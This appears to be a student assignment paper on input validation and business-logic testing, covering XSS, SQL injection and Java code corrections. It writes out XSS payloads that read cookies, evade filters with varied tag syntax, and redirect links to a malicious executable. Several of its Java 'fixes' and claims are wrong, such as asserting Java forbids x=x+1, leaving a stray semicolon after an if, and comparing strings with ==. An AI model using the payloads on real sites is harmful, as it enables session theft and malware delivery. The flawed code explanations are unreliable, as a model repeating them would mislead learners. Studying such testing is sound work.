Running head: INPUT VALIDATION AND BUSINESS LOGIC SECURITY CONTROLS 1

Input Validation and Business Logic Security Controls

Name of Author

Institutional Affiliation

Date of Submission
 INPUT VALIDATION AND BUSINESS LOGIC SECURITY CONTROLS 2

Input Validation and Business Logic Security Controls

1). Reflected Cross-site Scripting is an attack that targets users through browsers that make use
of the HTTP protocol. The attacker basically achieves this by injecting executable code to a
browser within a single HTTP response. HTTP responses occur when a user requests an HTTP
based page. The attacker exploits this by embedding this code to the response so that users who
end up clicking on the response. The attack is non-persistent and only attacks users who fall for
these gambits and end up clicking on malicious links or accessing third-party sites. The attack is
sophisticated since its made part of the HTTP parameters with an application not properly
processed then parsed to the victim.
Example 1
One way to test for this is to make use of providing a link that is not sanitized. Such can be a
simple html page with a link to a remote download link hosted by the tester. Having the
malicious code embedded in the JavaScript code in the html link ensures a tester can execute
code on any browser when the link is clicked. This thus shows that there is an XSS vulnerability.

http://example.com/index.php?user=<script>alert(“ Hello User!!”)</script>

Example 2
Another way is having a user download a malicious executable file provided by the tester
through a third-party website link. The extension file will grant him access to the browser.

http://example.com/index.php?user=<script>window.onload = function() {var

AllLinks=document.getElementsByTagName("a");
AllLinks[0].href = "http://anexamplewebpage.com/malicious.exe"; }</script>

Example 3
Another way is to bypass the tag attribute filter values. The filters are based on a blacklist and
thus cannot block every type of expression. The web application can make use of simple input
attribute tag and thus the tester could just provide the code below.

" onfocus="alert(document.cookie)

Example 4
Make use of different syntax to avoid signature-based filters that are easily defeated. The two
variations in the encoding are accepted by the browsers as valid HTML.
 INPUT VALIDATION AND BUSINESS LOGIC SECURITY CONTROLS 3

“><script >alert(document.cookie)</script >

"><ScRiPt>alert(document.cookie)</ScRiPt>

2). Stored Cross-site scripting is a vulnerability that makes applications that allow user stored
data to existing susceptible to it. It considered being one of the most dangerous cross-site
scripting types. Since the web applications allow user input that is stored, this proves to be risky
since the incorrectly filtered input will become part of the website. The vulnerability, however,
does rely on two requests from and to the application.

Example 1
Simply make use of the input tag in HTML syntax to inject code outside it. An example is shown
below;

<input class="inputbox" type="text" name="email" size="40"

value="[email protected]"> MALICIOUS CODE <!-- />

Example 2
Another way would involve the tester testing both the filtering controls and validation associated
with the application. Using JavaScript the example injection would look like below complete
with HTML tags.

<input class="inputbox" type="text" name="Email" size="50"

value="[email protected]"><script>alert(document.cookie)</script>

3). A form that includes the provided code would be susceptible to an SQL Injection attack
simply because an attacker can decide to supply crafted input that makes the original statement
perform further actions than what it was meant.
To determine if the application is vulnerable, simply perform the tests below on it;
Perform a classical SQL Injection by providing default values of one to check if the application
allows entry without actual credentials.
Make use of a simple SELECT statement in SQL to play with the logic of the application to see
if it is vulnerable.
The easiest way to avoid this attack is simply not constructed a query that relies on user input.
Although it might work for some injection attacks, it would appear useless to others.
Result = RunQuery(SELECT * FROM Students WHERE EMPLID=? AND EMAIL=?”)
 INPUT VALIDATION AND BUSINESS LOGIC SECURITY CONTROLS 4

4). a) This program would raise a variable not declared error. Java does not allow programmers
to set the increment of a variable using the variable itself i.e. x=x+1. Java only supports x++ or
x=+1 format. The fixed code is shown below;
int x;
x=+1;
System.out.println("X = " + x);
b) Two error exists here. First, the variable “i” is not initialized so it raises concern. Secondly,
the semicolon directly after the closing bracket of the for loop terminates the code before
executing the inner block. To fix this simply make like shown below;
for (int i=1; i<=5; i++) {
System.out.println("Number is " + i);
}
c) The issue here is that the variables are not initialized. Running the programs as is would have
an error. The simplest solution is to declare the variables and assign them values or rely on user
input.
int z=5;
int d=3;
if ( z > d) ; {
System.out.println("Z is bigger");
}
d) The error is due to the use of quotation marks not supported by java language encoding. To
solve this, remove the Greek quotation marks and replace them with regular quotation marks.
String m1="one";
String m2="two";
if(m1 == m2) {
System.out.println("M1 is equal to M2");
}
e) The error here is that the result of the calculations is not provided to the user. Its common
programming knowledge to provide an output. Furthermore, the area variable computation is
simply wrong since it does not follow the rules of BODMAS. To get the correct results after
computation, it is advised to use brackets where necessary. In java, we use the System.out to
print the result of area computation.
 INPUT VALIDATION AND BUSINESS LOGIC SECURITY CONTROLS 5

double area;
double base1 = 2.3;
double base2 = 4.8;
double height = 12.5;
area =(( base1 + base2)/2.0) * height;
System.out.println("The area of the Trapezoid is: "+area);
5) Business Logic errors are ways in which the core logic of a website or application that defines
data creation, manipulation and storage are interfered with. These errors can be very harmful to
an organization since they interfere with application process flow which in turn bring about
losses. The major reason to perform integrity checks is to ensure that attackers do not tamper and
alter application data which causes the data to lose its integrity. Two integrity checks would be
data validation and data verification. To check data verification, a proxy can be used to try and
use fake credentials to access a server. The invalid credentials should be checked against existing
ones. To test for data validity simply attempt insertion, deletion or updating of data to check
behavior in accordance with business logic workflow.

6) Circumventing the workflow involves making sure an application does not allow actions
outside the approved business process flow. It aims to ensure that all actions are within the
business process by bypassing correct sequence testing. This is important as it prevents
circumvention of important application sections that can allow them to complete an action
without going through the correct business process. One example of circumvention is a buyer
exploiting the loyalty points awarded to their accounts when one makes purchases. They can
simply cancel the transaction and still have the point without purchasing the product. Another is
an electronic bulletin board that allows users to edit posts after they are compared to a black list.
The owners can simply add the words blacklisted. Testing include;
Start a transaction going through the application to the users account then cancel out of the
transaction so that the point values should be decreased. Finally, check the points system to
ensure that the points are recorded.
On a bulletin board enter and save valid initial text values. Try to append, edit and remove data
that makes the existing data invalid. Invalid data may be specific words like.
 INPUT VALIDATION AND BUSINESS LOGIC SECURITY CONTROLS 6

WORK CITED
Arce, I., Clark-Fisher, K., Daswani, N., DelGrosso, J., Dhillon, D., Kern, C., ... & Seltzer, M. (2014).
Avoiding the top 10 software security design flaws. IEEE Computer Society Center for Secure
Design (CSD), Tech. Rep.

Razzaq, A., Latif, K., Ahmad, H. F., Hur, A., Anwar, Z., & Bloodsworth, P. C. (2014). Semantic security
against web application attacks. Information Sciences, 254, 19-38.

Guinta, L. R., & Frantzve, L. A. (2010). U.S. Patent Application No. 11/792,983.